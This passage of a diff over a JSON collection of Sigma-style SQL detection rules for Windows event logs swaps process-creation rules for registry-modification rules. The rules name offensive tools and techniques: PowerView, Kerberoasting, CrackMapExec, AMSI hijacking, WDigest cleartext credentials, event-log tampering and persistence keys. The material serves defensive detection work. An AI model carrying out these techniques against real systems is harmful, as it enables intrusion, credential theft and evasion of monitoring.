LIKE '%Get-NetGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGroupMember%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetProcess%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSubnet%' ESCAPE '\\' OR CommandLine LIKE 
'%Get-NetUser%' ESCAPE '\\' OR CommandLine LIKE '%Get-PathAcl%' ESCAPE '\\' OR CommandLine LIKE '%Get-PrincipalContext%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegCachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegLastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegProxy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharefinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR CommandLine LIKE '%Remove-DomainObjectAcl%' ESCAPE '\\' OR CommandLine LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Request-SPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Set-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Test-AdminAccess%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%CLSID\\\\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%CLSID\\\\{7C857801-7381-11CF-884D-00AA004B2E24}\\\\InProcServer32\\\\(Default)' ESCAPE '\\')) AND NOT ((NewValue LIKE '%system32\\\\wbem\\\\wmiutils.dll' ESCAPE '\\' OR NewValue LIKE '%system32\\\\wbem\\\\wbemsvc.dll' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_sharpview.yml" + "filename": "registry_set_cve_2021_31979_cve_2021_33771_exploits.yml" }, { - "title": "UEFI Persistence Via Wpbbin - ProcessCreation", - "id": "4abc0ec4-db5a-412f-9632-26659cddf145", - "status": "experimental", - 
"description": "Detects execution of the binary \"wpbbin\" which is used as part of the UEFI based persistence method described in the reference section", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "DHCP Callout DLL Installation", + "id": "9d3436ef-9476-4c43-acca-90ce06bdf33a", + "status": "test", + "description": "Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)", + "author": "Dimitrios Slamaris", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.t1542.001" + "attack.t1574.002", + "attack.t1112" ], "falsepositives": [ - "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutDlls' ESCAPE '\\' OR TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutEnabled' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wpbbin_potential_persistence.yml" + "filename": "registry_set_dhcp_calloutdll.yml" }, { - "title": "Suspicious PowerShell Command Line", - "id": "d7bcd677-645d-4691-a8d4-7a5602b780d1", - "status": "test", - "description": "Detects the PowerShell command lines with special characters", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)", + "title": "Potential EventLog File Location Tampering", + "id": "0cb8d736-995d-4ce7-a31e-1e8d452a1459", + "status": "experimental", + "description": "Detects tampering with EventLog service \"file\" key. 
In order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting", + "author": "D3F7A5105", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1562.002" ], "falsepositives": [ - "Unlikely", - "Amazon SSM Document Worker", - "Windows Defender ATP" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*') OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*') OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*') OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\^.*\\^.*\\^.*\\^.*\\^.*') OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*`.*`.*`.*`.*`.*')) AND NOT (ParentProcessName LIKE 'C:\\\\Program Files\\\\Amazon\\\\SSM\\\\ssm-document-worker.exe' ESCAPE '\\')) AND NOT (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*' AND (CommandLine LIKE '%new EventSource(\"Microsoft.Windows.Sense.Client.Management\"%' ESCAPE '\\' OR CommandLine LIKE '%public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle);%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 
'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\EventLog\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\File' ESCAPE '\\') AND NOT (NewValue LIKE '%\\\\System32\\\\Winevt\\\\Logs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_cmdline_special_characters.yml" + "filename": "registry_set_evtx_file_key_tamper.yml" }, { - "title": "Potential Persistence Via Powershell Search Order Hijacking - Task", - "id": "b66474aa-bd92-4333-a16c-298155b120df", - "status": "experimental", - "description": "Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell \"Get-Variable\" technique as seen being used in Colibri Loader", - "author": "pH-T (Nextron Systems), Florian Roth (Nextron Systems)", + "title": "Wdigest Enable UseLogonCredential", + "id": "d6a9b252-c666-4de6-8806-5561bbbd3bdc", + "status": "test", + "description": "Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to enable clear-text credentials", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k netsvcs%' ESCAPE '\\' AND ParentCommandLine LIKE '%-s Schedule%' ESCAPE '\\' AND (CommandLine LIKE '% -windowstyle hidden' ESCAPE '\\' OR CommandLine LIKE '% -w hidden' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass' ESCAPE '\\' OR CommandLine LIKE '% -noni' 
ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%WDigest\\\\UseLogonCredential' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_schtasks_powershell_persistence.yml" + "filename": "registry_set_wdigest_enable_uselogoncredential.yml" }, { - "title": "Suspicious Kernel Dump Using Dtrace", - "id": "7124aebe-4cd7-4ccb-8df0-6d6b93c96795", + "title": "Suspicious New Printer Ports in Registry (CVE-2020-1048)", + "id": "7ec912f2-5175-4868-b811-ec13ad0f8567", "status": "test", - "description": "Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048", + "author": "EagleEye Team, Florian Roth (Nextron Systems), NVISO", + "tags": [ + "attack.persistence", + "attack.execution", + "attack.defense_evasion", + "attack.t1112" + ], "falsepositives": [ - "Unknown" + "New printer port install on host" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\dtrace.exe' ESCAPE '\\' AND CommandLine LIKE '%lkd(0)%' ESCAPE '\\') OR (CommandLine LIKE '%syscall:::return%' ESCAPE '\\' AND CommandLine LIKE '%lkd(%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Ports%' ESCAPE '\\' AND (NewValue LIKE '%.dll%' ESCAPE '\\' OR NewValue LIKE '%.exe%' ESCAPE '\\' OR NewValue LIKE '%.bat%' ESCAPE '\\' OR NewValue LIKE '%.com%' ESCAPE '\\' OR 
NewValue LIKE '%C:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dtrace_kernel_dump.yml" + "filename": "registry_set_cve_2020_1048_new_printer_port.yml" }, { - "title": "CobaltStrike Process Patterns", - "id": "f35c5d71-b489-4e22-a115-f003df287317", + "title": "UAC Bypass via Event Viewer - Registry Set", + "id": "7c81fec3-1c1d-43b0-996a-46753041b1b6", "status": "experimental", - "description": "Detects process patterns found in Cobalt Strike beacon activity (see reference for more details) and also cases in which a China Chopper like webshell is used to run whoami", + "description": "Detects UAC bypass method using Windows event viewer", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" ], "falsepositives": [ - "Other programs that cause these patterns (please report)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((CommandLine LIKE '%\\\\cmd.exe /C whoami%' ESCAPE '\\' AND ParentProcessName LIKE 'C:\\\\Temp%' ESCAPE '\\') OR ((CommandLine LIKE '%cmd.exe /c echo%' ESCAPE '\\' OR CommandLine LIKE '%> \\\\\\\\.\\\\pipe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\whoami.exe%' ESCAPE '\\') AND ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\runonce.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\runonce.exe' ESCAPE '\\')) OR ((CommandLine LIKE '%conhost.exe 0xffffffff -ForceV1%' ESCAPE '\\' AND (ParentCommandLine LIKE '%/C whoami%' ESCAPE '\\' OR ParentCommandLine LIKE '%cmd.exe /C echo%' ESCAPE '\\' OR ParentCommandLine LIKE '% > \\\\\\\\.\\\\pipe%' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Internet Download Manager\\\\IDMMsgHost.exe%' ESCAPE '\\' OR ParentCommandLine LIKE '%chrome-extension://%' ESCAPE '\\')))))" + 
"SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\mscfile\\\\shell\\\\open\\\\command' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_cobaltstrike_process_patterns.yml" + "filename": "registry_set_uac_bypass_eventvwr.yml" }, { - "title": "Pingback Backdoor Activity", - "id": "b2400ffb-7680-47c0-b08a-098a7de7e7a9", - "status": "test", - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "author": "Bhabesh Raj", + "title": "Potential AMSI COM Server Hijacking", + "id": "160d2780-31f7-4922-8b3a-efce30e63e96", + "status": "experimental", + "description": "Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. 
This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1574.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\updata.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%msdtc%' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\' AND CommandLine LIKE '%auto%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\\\InProcServer32\\\\(Default)' ESCAPE '\\') AND NOT (NewValue LIKE '\\%windir\\%\\\\system32\\\\amsi.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_pingback_backdoor.yml" + "filename": "registry_set_amsi_com_hijack.yml" }, { - "title": "Mshtml DLL RunHTMLApplication Abuse", - "id": "4782eb5a-a513-4523-a0ac-f3082b26ac5c", - "status": "experimental", - "description": "Detects suspicious command line using the \"mshtml.dll\" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, htpp...)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Blackbyte Ransomware Registry", + "id": "83314318-052a-4c90-a1ad-660ece38d276", + "status": "test", + "description": "BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs 
WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\..\\\\%' ESCAPE '\\' AND CommandLine LIKE '%mshtml%' ESCAPE '\\' AND CommandLine LIKE '%RunHTMLApplication%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LocalAccountTokenFilterPolicy' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLinkedConnections' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\FileSystem\\\\LongPathsEnabled' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_rundll32_mshtml_runhtmlapplication.yml" + "filename": "registry_set_blackbyte_ransomware.yml" }, { - "title": "Suspicious Script Execution From Temp Folder", - "id": "a6a39bdb-935c-4f0a-ab77-35f4bbf44d33", + "title": "Disable Windows Event Logging Via Registry", + "id": "2f78da12-f7c7-430b-8b19-a28f269b77a3", "status": "experimental", - "description": "Detects a suspicious script executions from temporary folder", - "author": "Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton", + "description": "Detects tampering with the \"Enabled\" registry key in order to disable windows logging of a windows event channel", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Administrative scripts" + "Rare falsepositives may occur from legitimate administrators disabling specific event log for troubleshooting" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%\\\\Temp%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% >%' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Json%' ESCAPE '\\' OR CommandLine LIKE '%-WindowStyle hidden -Verb runAs%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\system32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Temp\\\\Amazon\\\\EC2-Windows\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Enabled' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)') AND NOT ((NewProcessName LIKE '%\\\\Windows\\\\system32\\\\wevtutil.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\winsxs\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-FileInfoMinifilter%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-ASN1\\\\%' ESCAPE '\\' OR TargetObject LIKE 
'%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Kernel-AppCompat\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Runtime\\\\Error\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-CAPI2/Operational\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Compat-Appraiser%' ESCAPE '\\'))) AND NOT ((NewProcessName = '') OR (NewProcessName = '')))" ], - "filename": "proc_creation_win_susp_script_exec_from_temp.yml" + "filename": "registry_set_disable_winevt_logging.yml" }, { - "title": "PowerShell Base64 Encoded Reflective Assembly Load", - "id": "62b7ccc9-23b4-471e-aa15-6da3663c4d59", - "status": "test", - "description": "Detects base64 encoded .NET reflective loading of Assembly", - "author": "Christian Burkard (Nextron Systems), pH-T (Nextron Systems)", + "title": "Change Winevt Event Access Permission Via Registry", + "id": "7d9263bd-dc47-4a58-bc92-5474abab390c", + "status": "experimental", + "description": "Detects tampering with the \"ChannelAccess\" registry key in order to change access to windows event channel", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1027", - "attack.t1620" + "attack.t1562.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE 
'%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\' OR CommandLine LIKE '%AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC%' ESCAPE '\\' OR CommandLine LIKE '%BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp%' ESCAPE '\\' OR CommandLine LIKE '%AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK%' ESCAPE '\\' OR CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ChannelAccess' ESCAPE '\\' AND (NewValue LIKE '%(A;;0x1;;;SY)%' ESCAPE '\\' OR NewValue LIKE '%(A;;0x5;;;BA)%' ESCAPE '\\' OR NewValue LIKE '%(A;;0x1;;;LA)%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_base64_reflective_assembly_load.yml" + "filename": "registry_set_change_winevt_channelaccess.yml" }, { - "title": "Execute Pcwrun.EXE To Leverage Follina", - 
"id": "6004abd0-afa4-4557-ba90-49d172e0a299", + "title": "Potential Persistence Via Excel Add-in - Registry", + "id": "961e33d1-4f86-4fcf-80ab-930a708b2f82", "status": "experimental", - "description": "Detects indirect command execution via Program Compatibility Assistant \"pcwrun.exe\" leveraging the follina (CVE-2022-30190) vulnerability", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.persistence", + "attack.t1137.006" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\pcwrun.exe' ESCAPE '\\' AND CommandLine LIKE '%../%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Excel\\\\Options' ESCAPE '\\' AND NewValue LIKE '/R %' ESCAPE '\\' AND NewValue LIKE '%.xll' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_pcwrun_follina.yml" + "filename": "registry_set_persistence_xll.yml" }, { - "title": "HackTool - CrackMapExec Execution", - "id": "42a993dd-bb3e-48c8-b372-4d6684c4106c", - "status": "test", - "description": "This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.", - "author": "Florian Roth (Nextron Systems)", + "title": "Add Debugger Entry To Hangs Key For Persistence", + "id": "833ef470-fa01-4631-a79b-6f291c9ac498", + "status": "experimental", + "description": "Detects when an attacker adds a new \"Debugger\" value to the \"Hangs\" key in order to achieve 
persistence which will get invoked when an application crashes", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence" + ], "falsepositives": [ - "Unknown" + "This value is not set by default but could be rarly used by administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\crackmapexec.exe' ESCAPE '\\' OR CommandLine LIKE '% -M pe\\_inject %' ESCAPE '\\' OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -x %' ESCAPE '\\') OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -H ''NTHASH''%' ESCAPE '\\') OR (CommandLine LIKE '% mssql %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -H %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -o %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% --local-auth%' ESCAPE '\\')) OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE 